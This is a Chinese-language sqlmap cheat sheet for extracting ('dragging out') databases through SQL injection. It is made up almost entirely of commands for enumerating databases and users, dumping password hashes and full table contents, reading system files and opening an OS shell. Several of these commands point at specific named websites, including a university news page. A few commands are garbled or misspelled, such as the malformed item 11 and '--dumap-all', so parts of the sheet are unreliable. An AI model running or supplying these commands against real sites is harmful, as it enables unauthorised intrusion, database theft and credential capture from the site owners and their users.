sqlmap.py -u "url" --tables 列出数据库中的表

( --tables:列出表)

sqlmap.py -u "url" -T 表 --columns 列出表中字段

-D:指定数据库名称

-T:指定要列出字段的表

--columns:指定列出字段

sqlmap.py -u "url" -T userb -C "帐号,密码" --dump

-C :指定要暴的字段

--dump:将结果导出

真正正确的语句?

SQLMAP注入拖库常用命令
SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。
我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。

#> ./sqlmap.py -u http://www.cqiyc.com/about.asp?ModuleId=534 -v 1 --dbs // 列举数据库

#> ./sqlmap.py -u http://pcfpci.zzu.edu.cn/news/show.asp?id=3919 -v 1 --current-db // 当前数据库

#>./sqlmap.py -u http://pcfpci.zzu.edu.cn/news/show.asp?id=3919 -v 1 --users // 列数据库用户

#> ./sqlmap.py -u http://pcfpci.zzu.edu.cn/news/show.asp?id=3919 -v 1 --current-user // 当前用户

#> ./sqlmap.py -u http://pcfpci.zzu.edu.cn/news/show.asp?id=3919 -v 1 --tables -D 20100705 // 列举数据库的表名

#> ./sqlmap.py -u http://pcfpci.zzu.edu.cn/news/show.asp?id=3919 -v 1 --columns -T “表名” -D “数据库” // 获取表的列名

#>./sqlmap.py -u http://pcfpci.zzu.edu.cn/news/show.asp?id=3919 -v 1 --dump -C “字段,字段” -T “表名” -D “数据库” // 获取表中的数据,包含列

已经开始拖库了,SQLMAP是非常人性化的,它会将获取的数据存储sqlmap/output/中、、、

1)判断当前用户是否是dba
python sqlmap.py -u "url" --is-dba -v 1
2)--users:列出数据库管理系统用户
python sqlmap.py -u "url" --users -v 0

3)--passwords:数据库用户密码(hash)
python sqlmap.py -u "url" --passwords -v 0
python sqlmap.py -u "url" --passwords -U sa -v 0

4)查看用户权限
python sqlmap.py -u "url" --privileges -v 0
python sqlmap.py -u "url" --privileges -U postgres -v 0

5)--dbs可以利用的数据库
python sqlmap.py -u "url" --dbs -v 0

6)--tables列数据库表
python sqlmap.py -u "url" --tables -D "jdf"

-D:指定数据名称

7)--columns 列出表中的列名
python sqlmap.py -u "url" --columns -T "user" -D "jdf" -v 1

-T:指定表名,-D:指定库名

8)--dump列表中指定列的内容
python sqlmap.py -u "url" --dump -C "name" -T "user" -D "jdf"
-C:可以指定字段

指定列的范围为2到4
python sqlmap.py -u "url" --dump -T "users" -D "xyyl" --start 2 --stop 4 -v 0

9)--dumap-all列出所有数据库,所有表内容
python sqlmap.py -u "url" --dump-all -v 0

只列出用户自己新建的数据库和表的内容

python sqlmap.py -u "url" --dump-all --exclude-sysdbs -v 0

10)--file读取文件内容[load_file()函数]
python sqlmap.py -u "url" --file /etc/password

11)执行SQL
python sqlmap.py -u "sqlmap.py -u "url" --is-dba -v 1" --os-shell

12)-p 指定参数
python sqlmap.py -u "url" -v 1 -p "id"

-p可以指定多参数-p "cat,id"

13)POST提交
python sqlmap.py -u "url" --method POST --data "id=1"

14)COOKIE提交
python sqlmap.py -u "url" --cookie "id=1" -v 1

cookie值可以由TamperData抓取

15)refer欺骗

python sqlmap.py -u "url" --refer "url" -v 3

16)使用自定义user-agent或者user-agents.txt
python sqlmap.py -u "url" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3

python sqlmap.py -u "url" -v 1 -a "./txt/user-agents.txt"

17)使用多线程猜解
python sqlmap.py -u "url" -v 1 --current-user --threads 3

18)指定数据库,绕过SQLMAP的自动检测
python sqlmap.py -u "url" -v 2 --dbms "PostgreSQL"

19)指定操作系统绕过SQLMAP自动检测
python sqlmap.py -u "url" -v 2 --os "Windows"

20)--prefix and --postfix自定义payload
python sqlmap.py -u "url" -v 3 -p "id" --prefix "'" --postfix "and 'test'='test"

21)union注入测试
python sqlmap.py -u "url" --union-test -v -1

22)配合order by
python sqlmap.py -u "url" --union-test --union-tech orderby -v 1

23)python sqlmap.py -u "url" -v 1 --union-use --banner

24)python sqlmap.py -u "url" -v 5 --union-use --current-user

25)python sqlmap.py -u "url" -v 1 --union-use --dbs